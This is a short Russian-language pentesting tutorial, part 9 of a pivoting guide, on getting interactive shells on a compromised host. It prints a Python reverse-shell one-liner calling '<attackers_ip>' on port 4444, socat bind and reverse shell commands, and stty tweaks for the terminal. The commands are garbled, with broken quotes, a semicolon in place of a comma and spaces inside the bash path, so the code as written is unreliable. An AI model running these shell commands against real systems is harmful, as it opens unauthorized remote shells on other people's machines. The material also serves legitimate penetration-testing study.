Руководство по pivoting. Часть 9

Оболочка Python PTY
Обновления от обычной полуинтерактивная оболочки. Вы можете выполнить следующую команду в существующей оболочке:

python -c ‘import pty; pty.spawn ( "/ bin / bash") "
Или запустить реверсивное подключения:
python -c ‘import socket, subprocess, os; \
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) \
s.connect (( "<attackers_ip>", 4444)); os.dup2 (s.fileno () 0); os.dup2 (s.fileno (), 1); \
os.dup2 (s.fileno (); 2); import pty; pty.spawn ( "/ bin / bash") "
Socat
Netcat на стероидах! Серьезно tho, просмотрите мануал этого инструмента man socat, и вы будете поражены ты, что можете сделать с помощью этого инструмента по туннелирования. Среди прочего, он может создать полностью интерактивную оболочку, даже лучше, чем вышеупомянутый python-pty. Недостатком является то, что вам, скорее всего, придется строить / устанавливать этот инструмент на целевом сервере, потому что это не утилитой по умолчанию в большинстве Unix-подобных дистрибутивов.

Bind оболочка
Установите слушателя:
socat TCP-LISTEN: 1337, reuseaddr, fork EXEC: bash, pty, stderr, setsid, sigint, sane
Подключитесь к слушателю:
socat FILE: `tty`, raw, echo = 0 TCP <victim_ip>: 1337
оболочка реверса
Установите слушателя:
socat TCP-LISTEN: 1337, reuseaddr FILE: `tty`, raw, echo = 0
Подключитесь к машине атакующего:
socat TCP4 <attackers_ip>: 1337 EXEC: bash, pty, stderr, setsid, sigint, sane
Размер терминала
По умолчанию размер терминала достаточно мал, что вы можете заметить, при запуске команды top или редактируя файлы с помощью текстового редактора. Вы можете легко изменить это, используя команду stty -a, чтобы получить размер обычного терминала:
$ Stty -a
speed 38400 baud; rows 57; columns 211; line = 0
Примените нужный размер для своего socat-терминала:
$ Stty rows 57 cols 211